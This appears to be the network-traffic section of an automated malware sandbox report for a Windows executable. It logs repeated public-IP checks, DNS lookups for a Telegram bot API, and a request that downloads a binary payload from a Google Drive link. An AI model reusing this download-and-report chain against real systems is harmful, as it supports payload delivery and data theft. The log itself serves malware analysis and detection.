                                                                                                                  Jan 10, 2025 22:40:21.754991055 CET1.1.1.1192.168.2.60x942aNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:21.754991055 CET1.1.1.1192.168.2.60x942aNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:29.420383930 CET1.1.1.1192.168.2.60x3602No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:48.256239891 CET1.1.1.1192.168.2.60xd431No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                  • drive.google.com
                                                                                                                  • drive.usercontent.google.com
                                                                                                                  • reallyfreegeoip.org
                                                                                                                  • api.telegram.org
                                                                                                                  • checkip.dyndns.org
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.649987132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:15.746716976 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 22:40:20.434643030 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:20 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 10, 2025 22:40:20.443990946 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 22:40:21.404453993 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:21 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 10, 2025 22:40:28.107544899 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 22:40:29.391491890 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:29 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.649990132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:30.523483038 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 22:40:31.318481922 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:31 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.649992132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:32.291057110 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 22:40:32.964500904 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:32 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.649994132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:33.922043085 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 22:40:35.593790054 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:35 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.649996132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:36.433839083 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 22:40:38.105823994 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:38 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.649999132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:39.086287022 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 22:40:40.552428961 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:40 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.650001132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:41.671372890 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 22:40:45.343734026 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:45 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 557
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.650002132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:45.363451958 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 22:40:48.248415947 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:48 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.650004132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:49.279896975 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 22:40:52.951751947 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:52 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 557
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.650005132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:52.962630987 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 22:40:57.146275997 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:57 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.650007132.226.247.73806068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 22:40:58.139220953 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 22:41:02.228669882 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:41:02 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.649984142.250.185.784436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:10 UTC216OUTGET /uc?export=download&id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_ HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                  Host: drive.google.com
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2025-01-10 21:40:10 UTC1920INHTTP/1.1 303 See Other
                                                                                                                  Content-Type: application/binary
                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:10 GMT
                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_&export=download
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                  Content-Security-Policy: script-src 'nonce-Hm24rbrXvbI89W57W26twA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                  Server: ESF
                                                                                                                  Content-Length: 0
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.649985142.250.185.1294436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:11 UTC258OUTGET /download?id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_&export=download HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 21:40:13 UTC4941INHTTP/1.1 200 OK
                                                                                                                  X-GUploader-UploadID: AFiumC5GcIR6-nXmNChrvX6-n31C_cTj3SqWhZBN1aqn0Y6PpglIm19JbsTQkm31xyBz2B74B7Il6PQ
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Content-Disposition: attachment; filename="VeXgAhFaHGK172.bin"
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 94272
                                                                                                                  Last-Modified: Tue, 10 Dec 2024 07:19:36 GMT
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:13 GMT
                                                                                                                  Expires: Fri, 10 Jan 2025 21:40:13 GMT
                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                  X-Goog-Hash: crc32c=ydyAEw==
                                                                                                                  Server: UploadServer
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
